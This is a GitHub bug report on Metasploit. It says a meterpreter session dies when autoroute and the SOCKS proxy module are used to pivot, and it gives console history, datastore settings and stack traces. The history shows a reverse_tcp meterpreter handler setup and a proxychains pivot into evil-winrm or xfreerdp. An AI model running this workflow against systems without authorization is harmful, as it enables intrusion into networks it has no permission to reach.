Skip to content
New issue

Have a question about this project? Sign up for a free GitHub account to open an issue and contact its maintainers and the community.

Sign up for GitHub

By clicking “Sign up for GitHub”, you agree to our terms of service and privacy statement. We’ll occasionally send you account related emails.

Already on GitHub? Sign in to your account

Jump to bottom

Autoroute kills meterpreter session #18478

Closed
mikekhusid opened this issue Oct 22, 2023 · 4 comments
Closed

Autoroute kills meterpreter session #18478

mikekhusid opened this issue Oct 22, 2023 · 4 comments
Labels
bug Stale Marks an issue as stale, to be closed if no action is taken

Comments

@mikekhusid
Copy link

Steps to reproduce

How'd you do it?

  1. Open a meterpreter session using windows/x64/meterpreter/reverse_tcp
  2. use autoroute and set to meterpreter session.
  3. use proxy_server, with socks4a (socks5 has same issue). exploit as job.
  4. proxychains.conf is set to proxy_server options (127.0.0.1 1080)
  5. use proxychains evil-winrm or proxychains xfreerdp
  6. meterpreter session outright dies or hangs

This did not use to happen! In same lab environment this worked fine several months ago.

Expected behavior

Meterpreter session does not die.

Current behavior

Meterpreter session dies

Metasploit version

Framework: 6.3.38-dev
Console : 6.3.38-dev

I also rolled back to 6.3.27 as a test and this still occurred.

Debug output:

Module/Datastore

The following global/module datastore, and database setup was configured before the issue occurred:

Collapse 
[framework/core]
loglevel=3

[framework/ui/console]
ActiveModule=auxiliary/server/socks_proxy

[server/socks_proxy]
SRVHOST=127.0.0.1
VERSION=4a
WORKSPACE=
VERBOSE=false
SRVPORT=1080
ListenerBindAddress=
ListenerBindPort=
ListenerComm=
USERNAME=
PASSWORD=

Database Configuration

The database contains the following information:

Collapse 
Session Type: postgresql selected, no connection

History

The following commands were ran during the session and before this issue occurred:

Collapse 
1140   set loglevel3
1141   set loglevel 3
1142   debug
1143   version
1144   use exploit/multi/handler
1145   set payload windows/x64/meterpreter/reverse_tcp
1146   set lhost tun0
1147   set lport 443
1148   exploit
1149   use autoroute
1150   set session 1
1151   exploit
1152   use socks_proxy
1153   set srvhost 127.0.0.1
1154   set version 4a
1155   exploit -j
1156   netstat -ntlp
1157   sessions
1158   session 1
1159   sessions 1
1160   debug

Framework Errors

The following framework errors occurred before the issue occurred:

Collapse 
[10/21/2023 20:35:35] [e(0)] core: Interrupt
[10/21/2023 20:36:07] [e(0)] core: Module autoroute not found, and no loading errors found. If you're using a custom module refer to our wiki: https://docs.metasploit.com/docs/using-metasploit/intermediate/running-private-modules.html
[10/21/2023 20:37:58] [e(0)] core: Module autoroute not found, and no loading errors found. If you're using a custom module refer to our wiki: https://docs.metasploit.com/docs/using-metasploit/intermediate/running-private-modules.html
[10/21/2023 20:42:10] [e(0)] core: Thread Exception: SOCKS4AProxyClient  critical=false    source:
    /usr/share/metasploit-framework/lib/metasploit/framework/thread_factory_provider.rb:25:in `spawn'
    /usr/share/metasploit-framework/lib/rex/thread_factory.rb:22:in `spawn'
    /usr/share/metasploit-framework/lib/rex/proto/proxy/socks4a.rb:235:in `start'
    /usr/share/metasploit-framework/lib/rex/proto/proxy/socks4a.rb:390:in `block in start'
    /usr/share/metasploit-framework/lib/rex/thread_factory.rb:22:in `block in spawn'
    /usr/share/metasploit-framework/lib/msf/core/thread_manager.rb:105:in `block in spawn' - Rex::TimeoutError Send timed out
[10/21/2023 20:43:38] [e(0)] core: Thread Exception: StreamMonitorRemote  critical=false    source:
    /usr/share/metasploit-framework/lib/metasploit/framework/thread_factory_provider.rb:25:in `spawn'
    /usr/share/metasploit-framework/lib/rex/thread_factory.rb:22:in `spawn'
    /usr/share/metasploit-framework/vendor/bundle/ruby/3.1.0/gems/rex-core-0.1.31/lib/rex/io/socket_abstraction.rb:136:in `monitor_rsock'
    /usr/share/metasploit-framework/vendor/bundle/ruby/3.1.0/gems/rex-core-0.1.31/lib/rex/io/stream_abstraction.rb:30:in `initialize_abstraction'
    /usr/share/metasploit-framework/lib/rex/post/meterpreter/channels/socket_abstraction.rb:56:in `initialize'
    /usr/share/metasploit-framework/lib/rex/post/meterpreter/extensions/stdapi/net/socket_subsystem/tcp_client_channel.rb:73:in `initialize'
    /usr/share/metasploit-framework/lib/rex/post/meterpreter/channel.rb:124:in `new'
    /usr/share/metasploit-framework/lib/rex/post/meterpreter/channel.rb:124:in `create'
    /usr/share/metasploit-framework/lib/rex/post/meterpreter/extensions/stdapi/net/socket_subsystem/tcp_client_channel.rb:36:in `open'
    /usr/share/metasploit-framework/lib/rex/post/meterpreter/extensions/stdapi/net/socket.rb:124:in `create_tcp_client_channel'
    /usr/share/metasploit-framework/lib/rex/post/meterpreter/extensions/stdapi/net/socket.rb:93:in `create'
    /usr/share/metasploit-framework/lib/msf/base/sessions/meterpreter.rb:587:in `create'
    /usr/share/metasploit-framework/vendor/bundle/ruby/3.1.0/gems/rex-socket-0.1.54/lib/rex/socket.rb:51:in `create_param'
    /usr/share/metasploit-framework/vendor/bundle/ruby/3.1.0/gems/rex-socket-0.1.54/lib/rex/socket/tcp.rb:37:in `create_param'
    /usr/share/metasploit-framework/vendor/bundle/ruby/3.1.0/gems/rex-socket-0.1.54/lib/rex/socket/tcp.rb:28:in `create'
    /usr/share/metasploit-framework/lib/rex/proto/proxy/socks4a.rb:252:in `block in start'
    /usr/share/metasploit-framework/lib/rex/thread_factory.rb:22:in `block in spawn'
    /usr/share/metasploit-framework/lib/msf/core/thread_manager.rb:105:in `block in spawn' - Rex::TimeoutError Send timed out
[10/21/2023 20:52:20] [e(0)] core: Thread Exception: SOCKS4AProxyServerRelay  critical=false    source:
    /usr/share/metasploit-framework/lib/metasploit/framework/thread_factory_provider.rb:25:in `spawn'
    /usr/share/metasploit-framework/lib/rex/thread_factory.rb:22:in `spawn'
    /usr/share/metasploit-framework/lib/rex/proto/proxy/socks4a.rb:168:in `relay'
    /usr/share/metasploit-framework/lib/rex/proto/proxy/socks4a.rb:315:in `block in start'
    /usr/share/metasploit-framework/lib/rex/thread_factory.rb:22:in `block in spawn'
    /usr/share/metasploit-framework/lib/msf/core/thread_manager.rb:105:in `block in spawn' - Rex::TimeoutError Send timed out
[10/21/2023 20:52:20] [e(0)] core: Thread Exception: SOCKS4AProxyServerRelay  critical=false    source:
    /usr/share/metasploit-framework/lib/metasploit/framework/thread_factory_provider.rb:25:in `spawn'
    /usr/share/metasploit-framework/lib/rex/thread_factory.rb:22:in `spawn'
    /usr/share/metasploit-framework/lib/rex/proto/proxy/socks4a.rb:168:in `relay'
    /usr/share/metasploit-framework/lib/rex/proto/proxy/socks4a.rb:314:in `block in start'
    /usr/share/metasploit-framework/lib/rex/thread_factory.rb:22:in `block in spawn'
    /usr/share/metasploit-framework/lib/msf/core/thread_manager.rb:105:in `block in spawn' - Rex::TimeoutError Send timed out
[10/21/2023 21:33:10] [e(0)] core: Failed to connect to the database: No database YAML file
[10/21/2023 21:40:54] [e(0)] core: Module autoroute not found, and no loading errors found. If you're using a custom module refer to our wiki: https://docs.metasploit.com/docs/using-metasploit/intermediate/running-private-modules.html
[10/21/2023 21:41:07] [e(0)] core: Module socks_proxy not found, and no loading errors found. If you're using a custom module refer to our wiki: https://docs.metasploit.com/docs/using-metasploit/intermediate/running-private-modules.html

Web Service Errors

The following web service errors occurred before the issue occurred:

Collapse 
msf-ws.log does not exist.

Framework Logs

The following framework logs were recorded before the issue occurred:

Collapse 
[10/21/2023 21:33:22] [d(2)] core: Stager bsdi/x86/reverse_tcp and stage windows/x64/custom have incompatible platforms: ["BSDi"] - ["Windows"]
[10/21/2023 21:33:22] [d(2)] core: Stager bsdi/x86/reverse_tcp and stage netware/shell have incompatible platforms: ["BSDi"] - ["Netware"]
[10/21/2023 21:33:22] [d(2)] core: Stager bsdi/x86/reverse_tcp and stage osx/x86/isight have incompatible platforms: ["BSDi"] - ["OSX"]
[10/21/2023 21:33:22] [d(2)] core: Stager bsdi/x86/reverse_tcp and stage osx/x86/vforkshell have incompatible platforms: ["BSDi"] - ["OSX"]
[10/21/2023 21:33:22] [d(2)] core: Stager bsdi/x86/reverse_tcp and stage osx/x86/bundleinject have incompatible platforms: ["BSDi"] - ["OSX"]
[10/21/2023 21:33:22] [d(2)] core: Stager bsdi/x86/reverse_tcp and stage osx/armle/execute have incompatible platforms: ["BSDi"] - ["OSX"]
[10/21/2023 21:33:22] [d(2)] core: Stager bsdi/x86/reverse_tcp and stage osx/armle/shell have incompatible platforms: ["BSDi"] - ["OSX"]
[10/21/2023 21:33:22] [d(2)] core: Stager bsdi/x86/reverse_tcp and stage osx/aarch64/meterpreter have incompatible platforms: ["BSDi"] - ["OSX"]
[10/21/2023 21:33:22] [d(2)] core: Stager bsdi/x86/reverse_tcp and stage osx/x64/meterpreter have incompatible platforms: ["BSDi"] - ["OSX"]
[10/21/2023 21:33:22] [d(2)] core: Stager bsdi/x86/reverse_tcp and stage osx/x64/dupandexecve have incompatible platforms: ["BSDi"] - ["OSX"]
[10/21/2023 21:33:22] [d(2)] core: Stager bsdi/x86/reverse_tcp and stage osx/ppc/shell have incompatible platforms: ["BSDi"] - ["OSX"]
[10/21/2023 21:33:22] [d(2)] core: Stager bsdi/x86/reverse_tcp and stage java/meterpreter have incompatible platforms: ["BSDi"] - ["Java"]
[10/21/2023 21:33:22] [d(2)] core: Stager bsdi/x86/reverse_tcp and stage java/shell have incompatible platforms: ["BSDi"] - ["Java"]
[10/21/2023 21:33:22] [d(2)] core: Stager bsdi/x86/reverse_tcp and stage python/meterpreter have incompatible platforms: ["BSDi"] - ["Python"]
[10/21/2023 21:33:22] [d(2)] core: Stager bsdi/x86/reverse_tcp and stage multi/meterpreter have incompatible platforms: ["BSDi"] - ["Multi"]
[10/21/2023 21:33:22] [d(2)] core: Stager bsdi/x86/reverse_tcp and stage linux/x86/meterpreter have incompatible platforms: ["BSDi"] - ["Linux"]
[10/21/2023 21:33:22] [d(2)] core: Stager bsdi/x86/reverse_tcp and stage linux/x86/shell have incompatible platforms: ["BSDi"] - ["Linux"]
[10/21/2023 21:33:22] [d(2)] core: Stager bsdi/x86/reverse_tcp and stage linux/mipsle/meterpreter have incompatible platforms: ["BSDi"] - ["Linux"]
[10/21/2023 21:33:22] [d(2)] core: Stager bsdi/x86/reverse_tcp and stage linux/mipsle/shell have incompatible platforms: ["BSDi"] - ["Linux"]
[10/21/2023 21:33:22] [d(2)] core: Stager bsdi/x86/reverse_tcp and stage linux/armle/meterpreter have incompatible platforms: ["BSDi"] - ["Linux"]
[10/21/2023 21:33:22] [d(2)] core: Stager bsdi/x86/reverse_tcp and stage linux/armle/shell have incompatible platforms: ["BSDi"] - ["Linux"]
[10/21/2023 21:33:22] [d(2)] core: Stager bsdi/x86/reverse_tcp and stage linux/aarch64/meterpreter have incompatible platforms: ["BSDi"] - ["Linux"]
[10/21/2023 21:33:22] [d(2)] core: Stager bsdi/x86/reverse_tcp and stage linux/aarch64/shell have incompatible platforms: ["BSDi"] - ["Linux"]
[10/21/2023 21:33:22] [d(2)] core: Stager bsdi/x86/reverse_tcp and stage linux/x64/meterpreter have incompatible platforms: ["BSDi"] - ["Linux"]
[10/21/2023 21:33:22] [d(2)] core: Stager bsdi/x86/reverse_tcp and stage linux/x64/shell have incompatible platforms: ["BSDi"] - ["Linux"]
[10/21/2023 21:33:22] [d(2)] core: Stager bsdi/x86/reverse_tcp and stage linux/mipsbe/meterpreter have incompatible platforms: ["BSDi"] - ["Linux"]
[10/21/2023 21:33:22] [d(2)] core: Stager bsdi/x86/reverse_tcp and stage linux/mipsbe/shell have incompatible platforms: ["BSDi"] - ["Linux"]
[10/21/2023 21:33:22] [d(2)] core: Stager bsdi/x86/reverse_tcp and stage android/meterpreter have incompatible platforms: ["BSDi"] - ["Android"]
[10/21/2023 21:33:22] [d(2)] core: Stager bsdi/x86/reverse_tcp and stage android/shell have incompatible platforms: ["BSDi"] - ["Android"]
[10/21/2023 21:33:22] [d(2)] core: Stager bsdi/x86/reverse_tcp and stage bsd/x86/shell have incompatible platforms: ["BSDi"] - ["BSD"]
[10/21/2023 21:33:22] [d(1)] core: Module  is compatible with
[10/21/2023 21:33:22] [d(1)] core: Module  is compatible with
[10/21/2023 21:33:22] [d(2)] core: Built staged payload bsdi/x86/shell/reverse_tcp.
[10/21/2023 21:34:48] [i(2)] core: Reloading exploit module multi/handler. Ambiguous module warnings are safe to ignore
[10/21/2023 21:35:03] [d(3)] core: Checking compat [windows/x64/meterpreter/reverse_tcp with multi/handler]: reverse to reverse
[10/21/2023 21:35:03] [d(3)] core: Checking compat [windows/x64/meterpreter/reverse_tcp with multi/handler]: bind to reverse
[10/21/2023 21:35:03] [d(3)] core: Checking compat [windows/x64/meterpreter/reverse_tcp with multi/handler]: noconn to reverse
[10/21/2023 21:35:03] [d(3)] core: Checking compat [windows/x64/meterpreter/reverse_tcp with multi/handler]: none to reverse
[10/21/2023 21:35:03] [d(3)] core: Checking compat [windows/x64/meterpreter/reverse_tcp with multi/handler]: tunnel to reverse
[10/21/2023 21:35:03] [d(1)] core: Module windows/x64/meterpreter/reverse_tcp is compatible with multi/handler
[10/21/2023 21:40:54] [e(0)] core: Module autoroute not found, and no loading errors found. If you're using a custom module refer to our wiki: https://docs.metasploit.com/docs/using-metasploit/intermediate/running-private-modules.html
[10/21/2023 21:40:54] [i(2)] core: Reloading post module multi/manage/autoroute. Ambiguous module warnings are safe to ignore
[10/21/2023 21:41:07] [e(0)] core: Module socks_proxy not found, and no loading errors found. If you're using a custom module refer to our wiki: https://docs.metasploit.com/docs/using-metasploit/intermediate/running-private-modules.html
[10/21/2023 21:41:07] [i(2)] core: Reloading auxiliary module server/socks_proxy. Ambiguous module warnings are safe to ignore
[10/21/2023 21:41:22] [w(0)] core: Socks4a.start - The address is already in use or unavailable: (127.0.0.1:1080).
[10/21/2023 21:43:14] [w(0)] core: Client.start - Failed to handle the clients request.
[10/21/2023 21:43:29] [w(0)] core: Client.start - Failed to handle the clients request.
[10/21/2023 21:43:44] [w(0)] core: Client.start - Failed to handle the clients request.
[10/21/2023 21:46:10] [d(0)] core: monitor_rsock: EOF in rsock
[10/21/2023 21:46:10] [d(0)] core: monitor_rsock: EOF in rsock

Web Service Logs

The following web service logs were recorded before the issue occurred:

Collapse 
msf-ws.log does not exist.

Version/Install

The versions and install method of your Metasploit setup:

Collapse 
Framework: 6.3.38-dev
Ruby: ruby 3.1.2p20 (2022-04-12 revision 4491bb740a) [x86_64-linux-gnu]
OpenSSL: OpenSSL 3.0.8 7 Feb 2023
Install Root: /usr/share/metasploit-framework
Session Type: postgresql selected, no connection
Install Method: Other - Please specify
@mikekhusid mikekhusid added the bug label Oct 22, 2023
@mikekhusid
Copy link
Author

Even just exploiting autoroute kills the session sometimes:

Module/Datastore

The following global/module datastore, and database setup was configured before the issue occurred:

Collapse 
[framework/core]
loglevel=3

[framework/ui/console]
ActiveModule=post/multi/manage/autoroute

[multi/manage/autoroute]
SESSION=2
WORKSPACE=
VERBOSE=false
SUBNET=
NETMASK=255.255.255.0
CMD=autoadd

Database Configuration

The database contains the following information:

Collapse 
Session Type: postgresql selected, no connection

History

The following commands were ran during the session and before this issue occurred:

Collapse 
1140   set loglevel3
1141   set loglevel 3
1142   debug
1143   version
1144   use exploit/multi/handler
1145   set payload windows/x64/meterpreter/reverse_tcp
1146   set lhost tun0
1147   set lport 443
1148   exploit
1149   use autoroute
1150   set session 1
1151   exploit
1152   use socks_proxy
1153   set srvhost 127.0.0.1
1154   set version 4a
1155   exploit -j
1156   netstat -ntlp
1157   sessions
1158   session 1
1159   sessions 1
1160   debug
1161   version
1162   use exploit/multi/handler
1163   show options
1164   exploit
1165   use autoroute
1166   set session 2
1167   exploit
1168   debug

Framework Errors

The following framework errors occurred before the issue occurred:

Collapse 
[10/21/2023 21:33:10] [e(0)] core: Failed to connect to the database: No database YAML file
[10/21/2023 21:40:54] [e(0)] core: Module autoroute not found, and no loading errors found. If you're using a custom module refer to our wiki: https://docs.metasploit.com/docs/using-metasploit/intermediate/running-private-modules.html
[10/21/2023 21:41:07] [e(0)] core: Module socks_proxy not found, and no loading errors found. If you're using a custom module refer to our wiki: https://docs.metasploit.com/docs/using-metasploit/intermediate/running-private-modules.html
[10/21/2023 21:51:10] [e(0)] core: Thread Exception: StreamMonitorRemote  critical=false    source:
    /usr/share/metasploit-framework/lib/metasploit/framework/thread_factory_provider.rb:25:in `spawn'
    /usr/share/metasploit-framework/lib/rex/thread_factory.rb:22:in `spawn'
    /usr/share/metasploit-framework/vendor/bundle/ruby/3.1.0/gems/rex-core-0.1.31/lib/rex/io/socket_abstraction.rb:136:in `monitor_rsock'
    /usr/share/metasploit-framework/vendor/bundle/ruby/3.1.0/gems/rex-core-0.1.31/lib/rex/io/stream_abstraction.rb:30:in `initialize_abstraction'
    /usr/share/metasploit-framework/lib/rex/post/meterpreter/channels/socket_abstraction.rb:56:in `initialize'
    /usr/share/metasploit-framework/lib/rex/post/meterpreter/extensions/stdapi/net/socket_subsystem/tcp_client_channel.rb:73:in `initialize'
    /usr/share/metasploit-framework/lib/rex/post/meterpreter/channel.rb:124:in `new'
    /usr/share/metasploit-framework/lib/rex/post/meterpreter/channel.rb:124:in `create'
    /usr/share/metasploit-framework/lib/rex/post/meterpreter/extensions/stdapi/net/socket_subsystem/tcp_client_channel.rb:36:in `open'
    /usr/share/metasploit-framework/lib/rex/post/meterpreter/extensions/stdapi/net/socket.rb:124:in `create_tcp_client_channel'
    /usr/share/metasploit-framework/lib/rex/post/meterpreter/extensions/stdapi/net/socket.rb:93:in `create'
    /usr/share/metasploit-framework/lib/msf/base/sessions/meterpreter.rb:587:in `create'
    /usr/share/metasploit-framework/vendor/bundle/ruby/3.1.0/gems/rex-socket-0.1.54/lib/rex/socket.rb:51:in `create_param'
    /usr/share/metasploit-framework/vendor/bundle/ruby/3.1.0/gems/rex-socket-0.1.54/lib/rex/socket/tcp.rb:37:in `create_param'
    /usr/share/metasploit-framework/vendor/bundle/ruby/3.1.0/gems/rex-socket-0.1.54/lib/rex/socket/tcp.rb:28:in `create'
    /usr/share/metasploit-framework/lib/rex/proto/proxy/socks4a.rb:252:in `block in start'
    /usr/share/metasploit-framework/lib/rex/thread_factory.rb:22:in `block in spawn'
    /usr/share/metasploit-framework/lib/msf/core/thread_manager.rb:105:in `block in spawn' - Rex::TimeoutError Send timed out
Call stack:
/usr/share/metasploit-framework/lib/rex/post/meterpreter/packet_dispatcher.rb:181:in `send_request'
/usr/share/metasploit-framework/lib/rex/post/meterpreter/extensions/stdapi/net/socket_subsystem/tcp_client_channel.rb:114:in `shutdown'
/usr/share/metasploit-framework/lib/rex/post/meterpreter/extensions/stdapi/net/socket_subsystem/tcp_client_channel.rb:96:in `close_write'
/usr/share/metasploit-framework/vendor/bundle/ruby/3.1.0/gems/rex-core-0.1.31/lib/rex/io/socket_abstraction.rb:204:in `block (2 levels) in monitor_rsock'
/usr/share/metasploit-framework/vendor/bundle/ruby/3.1.0/gems/rex-core-0.1.31/lib/rex/io/socket_abstraction.rb:137:in `loop'
/usr/share/metasploit-framework/vendor/bundle/ruby/3.1.0/gems/rex-core-0.1.31/lib/rex/io/socket_abstraction.rb:137:in `block in monitor_rsock'
/usr/share/metasploit-framework/lib/rex/thread_factory.rb:22:in `block in spawn'
/usr/share/metasploit-framework/lib/msf/core/thread_manager.rb:105:in `block in spawn'
[10/21/2023 21:51:10] [e(0)] core: Thread Exception: SOCKS4AProxyServerRelay  critical=false    source:
    /usr/share/metasploit-framework/lib/metasploit/framework/thread_factory_provider.rb:25:in `spawn'
    /usr/share/metasploit-framework/lib/rex/thread_factory.rb:22:in `spawn'
    /usr/share/metasploit-framework/lib/rex/proto/proxy/socks4a.rb:168:in `relay'
    /usr/share/metasploit-framework/lib/rex/proto/proxy/socks4a.rb:315:in `block in start'
    /usr/share/metasploit-framework/lib/rex/thread_factory.rb:22:in `block in spawn'
    /usr/share/metasploit-framework/lib/msf/core/thread_manager.rb:105:in `block in spawn' - Rex::TimeoutError Send timed out
Call stack:
/usr/share/metasploit-framework/lib/rex/post/meterpreter/packet_dispatcher.rb:181:in `send_request'
/usr/share/metasploit-framework/lib/rex/post/meterpreter/extensions/stdapi/net/socket_subsystem/tcp_client_channel.rb:114:in `shutdown'
/usr/share/metasploit-framework/lib/rex/post/meterpreter/extensions/stdapi/net/socket_subsystem/tcp_client_channel.rb:96:in `close_write'
/usr/share/metasploit-framework/vendor/bundle/ruby/3.1.0/gems/rex-core-0.1.31/lib/rex/io/socket_abstraction.rb:204:in `block (2 levels) in monitor_rsock'
/usr/share/metasploit-framework/vendor/bundle/ruby/3.1.0/gems/rex-core-0.1.31/lib/rex/io/socket_abstraction.rb:137:in `loop'
/usr/share/metasploit-framework/vendor/bundle/ruby/3.1.0/gems/rex-core-0.1.31/lib/rex/io/socket_abstraction.rb:137:in `block in monitor_rsock'
/usr/share/metasploit-framework/lib/rex/thread_factory.rb:22:in `block in spawn'
/usr/share/metasploit-framework/lib/msf/core/thread_manager.rb:105:in `block in spawn'
[10/21/2023 21:51:10] [e(0)] core: Thread Exception: SOCKS4AProxyServerRelay  critical=false    source:
    /usr/share/metasploit-framework/lib/metasploit/framework/thread_factory_provider.rb:25:in `spawn'
    /usr/share/metasploit-framework/lib/rex/thread_factory.rb:22:in `spawn'
    /usr/share/metasploit-framework/lib/rex/proto/proxy/socks4a.rb:168:in `relay'
    /usr/share/metasploit-framework/lib/rex/proto/proxy/socks4a.rb:314:in `block in start'
    /usr/share/metasploit-framework/lib/rex/thread_factory.rb:22:in `block in spawn'
    /usr/share/metasploit-framework/lib/msf/core/thread_manager.rb:105:in `block in spawn' - Rex::TimeoutError Send timed out
Call stack:
/usr/share/metasploit-framework/lib/rex/post/meterpreter/packet_dispatcher.rb:181:in `send_request'
/usr/share/metasploit-framework/lib/rex/post/meterpreter/extensions/stdapi/net/socket_subsystem/tcp_client_channel.rb:114:in `shutdown'
/usr/share/metasploit-framework/lib/rex/post/meterpreter/extensions/stdapi/net/socket_subsystem/tcp_client_channel.rb:96:in `close_write'
/usr/share/metasploit-framework/vendor/bundle/ruby/3.1.0/gems/rex-core-0.1.31/lib/rex/io/socket_abstraction.rb:204:in `block (2 levels) in monitor_rsock'
/usr/share/metasploit-framework/vendor/bundle/ruby/3.1.0/gems/rex-core-0.1.31/lib/rex/io/socket_abstraction.rb:137:in `loop'
/usr/share/metasploit-framework/vendor/bundle/ruby/3.1.0/gems/rex-core-0.1.31/lib/rex/io/socket_abstraction.rb:137:in `block in monitor_rsock'
/usr/share/metasploit-framework/lib/rex/thread_factory.rb:22:in `block in spawn'
/usr/share/metasploit-framework/lib/msf/core/thread_manager.rb:105:in `block in spawn'
[10/21/2023 21:56:10] [e(0)] core: Thread Exception: StreamMonitorRemote  critical=false    source:
    /usr/share/metasploit-framework/lib/metasploit/framework/thread_factory_provider.rb:25:in `spawn'
    /usr/share/metasploit-framework/lib/rex/thread_factory.rb:22:in `spawn'
    /usr/share/metasploit-framework/vendor/bundle/ruby/3.1.0/gems/rex-core-0.1.31/lib/rex/io/socket_abstraction.rb:136:in `monitor_rsock'
    /usr/share/metasploit-framework/vendor/bundle/ruby/3.1.0/gems/rex-core-0.1.31/lib/rex/io/stream_abstraction.rb:30:in `initialize_abstraction'
    /usr/share/metasploit-framework/lib/rex/post/meterpreter/channels/socket_abstraction.rb:56:in `initialize'
    /usr/share/metasploit-framework/lib/rex/post/meterpreter/extensions/stdapi/net/socket_subsystem/tcp_client_channel.rb:73:in `initialize'
    /usr/share/metasploit-framework/lib/rex/post/meterpreter/channel.rb:124:in `new'
    /usr/share/metasploit-framework/lib/rex/post/meterpreter/channel.rb:124:in `create'
    /usr/share/metasploit-framework/lib/rex/post/meterpreter/extensions/stdapi/net/socket_subsystem/tcp_client_channel.rb:36:in `open'
    /usr/share/metasploit-framework/lib/rex/post/meterpreter/extensions/stdapi/net/socket.rb:124:in `create_tcp_client_channel'
    /usr/share/metasploit-framework/lib/rex/post/meterpreter/extensions/stdapi/net/socket.rb:93:in `create'
    /usr/share/metasploit-framework/lib/msf/base/sessions/meterpreter.rb:587:in `create'
    /usr/share/metasploit-framework/vendor/bundle/ruby/3.1.0/gems/rex-socket-0.1.54/lib/rex/socket.rb:51:in `create_param'
    /usr/share/metasploit-framework/vendor/bundle/ruby/3.1.0/gems/rex-socket-0.1.54/lib/rex/socket/tcp.rb:37:in `create_param'
    /usr/share/metasploit-framework/vendor/bundle/ruby/3.1.0/gems/rex-socket-0.1.54/lib/rex/socket/tcp.rb:28:in `create'
    /usr/share/metasploit-framework/lib/rex/proto/proxy/socks4a.rb:252:in `block in start'
    /usr/share/metasploit-framework/lib/rex/thread_factory.rb:22:in `block in spawn'
    /usr/share/metasploit-framework/lib/msf/core/thread_manager.rb:105:in `block in spawn' - Rex::TimeoutError Send timed out
Call stack:
/usr/share/metasploit-framework/lib/rex/post/meterpreter/packet_dispatcher.rb:181:in `send_request'
/usr/share/metasploit-framework/lib/rex/post/meterpreter/extensions/stdapi/net/socket_subsystem/tcp_client_channel.rb:114:in `shutdown'
/usr/share/metasploit-framework/lib/rex/post/meterpreter/extensions/stdapi/net/socket_subsystem/tcp_client_channel.rb:96:in `close_write'
/usr/share/metasploit-framework/vendor/bundle/ruby/3.1.0/gems/rex-core-0.1.31/lib/rex/io/socket_abstraction.rb:204:in `block (2 levels) in monitor_rsock'
/usr/share/metasploit-framework/vendor/bundle/ruby/3.1.0/gems/rex-core-0.1.31/lib/rex/io/socket_abstraction.rb:137:in `loop'
/usr/share/metasploit-framework/vendor/bundle/ruby/3.1.0/gems/rex-core-0.1.31/lib/rex/io/socket_abstraction.rb:137:in `block in monitor_rsock'
/usr/share/metasploit-framework/lib/rex/thread_factory.rb:22:in `block in spawn'
/usr/share/metasploit-framework/lib/msf/core/thread_manager.rb:105:in `block in spawn'
[10/21/2023 21:56:10] [e(0)] core: Thread Exception: SOCKS4AProxyServerRelay  critical=false    source:
    /usr/share/metasploit-framework/lib/metasploit/framework/thread_factory_provider.rb:25:in `spawn'
    /usr/share/metasploit-framework/lib/rex/thread_factory.rb:22:in `spawn'
    /usr/share/metasploit-framework/lib/rex/proto/proxy/socks4a.rb:168:in `relay'
    /usr/share/metasploit-framework/lib/rex/proto/proxy/socks4a.rb:315:in `block in start'
    /usr/share/metasploit-framework/lib/rex/thread_factory.rb:22:in `block in spawn'
    /usr/share/metasploit-framework/lib/msf/core/thread_manager.rb:105:in `block in spawn' - Rex::TimeoutError Send timed out
Call stack:
/usr/share/metasploit-framework/lib/rex/post/meterpreter/packet_dispatcher.rb:181:in `send_request'
/usr/share/metasploit-framework/lib/rex/post/meterpreter/extensions/stdapi/net/socket_subsystem/tcp_client_channel.rb:114:in `shutdown'
/usr/share/metasploit-framework/lib/rex/post/meterpreter/extensions/stdapi/net/socket_subsystem/tcp_client_channel.rb:96:in `close_write'
/usr/share/metasploit-framework/vendor/bundle/ruby/3.1.0/gems/rex-core-0.1.31/lib/rex/io/socket_abstraction.rb:204:in `block (2 levels) in monitor_rsock'
/usr/share/metasploit-framework/vendor/bundle/ruby/3.1.0/gems/rex-core-0.1.31/lib/rex/io/socket_abstraction.rb:137:in `loop'
/usr/share/metasploit-framework/vendor/bundle/ruby/3.1.0/gems/rex-core-0.1.31/lib/rex/io/socket_abstraction.rb:137:in `block in monitor_rsock'
/usr/share/metasploit-framework/lib/rex/thread_factory.rb:22:in `block in spawn'
/usr/share/metasploit-framework/lib/msf/core/thread_manager.rb:105:in `block in spawn'
[10/21/2023 21:56:10] [e(0)] core: Thread Exception: SOCKS4AProxyServerRelay  critical=false    source:
    /usr/share/metasploit-framework/lib/metasploit/framework/thread_factory_provider.rb:25:in `spawn'
    /usr/share/metasploit-framework/lib/rex/thread_factory.rb:22:in `spawn'
    /usr/share/metasploit-framework/lib/rex/proto/proxy/socks4a.rb:168:in `relay'
    /usr/share/metasploit-framework/lib/rex/proto/proxy/socks4a.rb:314:in `block in start'
    /usr/share/metasploit-framework/lib/rex/thread_factory.rb:22:in `block in spawn'
    /usr/share/metasploit-framework/lib/msf/core/thread_manager.rb:105:in `block in spawn' - Rex::TimeoutError Send timed out
Call stack:
/usr/share/metasploit-framework/lib/rex/post/meterpreter/packet_dispatcher.rb:181:in `send_request'
/usr/share/metasploit-framework/lib/rex/post/meterpreter/extensions/stdapi/net/socket_subsystem/tcp_client_channel.rb:114:in `shutdown'
/usr/share/metasploit-framework/lib/rex/post/meterpreter/extensions/stdapi/net/socket_subsystem/tcp_client_channel.rb:96:in `close_write'
/usr/share/metasploit-framework/vendor/bundle/ruby/3.1.0/gems/rex-core-0.1.31/lib/rex/io/socket_abstraction.rb:204:in `block (2 levels) in monitor_rsock'
/usr/share/metasploit-framework/vendor/bundle/ruby/3.1.0/gems/rex-core-0.1.31/lib/rex/io/socket_abstraction.rb:137:in `loop'
/usr/share/metasploit-framework/vendor/bundle/ruby/3.1.0/gems/rex-core-0.1.31/lib/rex/io/socket_abstraction.rb:137:in `block in monitor_rsock'
/usr/share/metasploit-framework/lib/rex/thread_factory.rb:22:in `block in spawn'
/usr/share/metasploit-framework/lib/msf/core/thread_manager.rb:105:in `block in spawn'
[10/21/2023 22:58:59] [e(0)] core: Module autoroute not found, and no loading errors found. If you're using a custom module refer to our wiki: https://docs.metasploit.com/docs/using-metasploit/intermediate/running-private-modules.html

Web Service Errors

The following web service errors occurred before the issue occurred:

Collapse 
msf-ws.log does not exist.

Framework Logs

The following framework logs were recorded before the issue occurred:

Collapse 
/usr/share/metasploit-framework/vendor/bundle/ruby/3.1.0/gems/rex-socket-0.1.54/lib/rex/socket.rb:51:in `create_param'
    /usr/share/metasploit-framework/vendor/bundle/ruby/3.1.0/gems/rex-socket-0.1.54/lib/rex/socket/tcp.rb:37:in `create_param'
